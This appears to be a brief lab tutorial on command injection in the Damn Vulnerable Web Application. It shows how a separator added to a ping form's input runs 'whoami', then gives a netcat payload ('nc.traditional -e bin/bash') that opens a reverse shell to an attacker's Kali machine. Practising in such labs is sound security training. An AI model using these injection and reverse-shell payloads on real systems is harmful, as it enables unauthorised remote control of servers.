- Considering a website that is used to ping your ip-address/domain name for.eg. below is a website that would ping the entered ip-address/domain.
-
Login to OWASP and click on Damn Vulnerable Web Applications
-
You would be re-directed to DVWA's login page.
-
Type in sample command such as
whoami
after a dot and comma (.,) as below
-
In the result, you see the outputs of both commands i.e. ping and whoami.
- We can try to make a connection with DVWA's machine to our Kali Linux Machine. This can be done using
netcat
netcat
is used to connect 2 PCs- Typing the following command would allow us to connect to victim's machine:
<your-ip-address>;nc.traditional -e bin/bash <ip-address-of-machine-to-which-you-want-to-connect>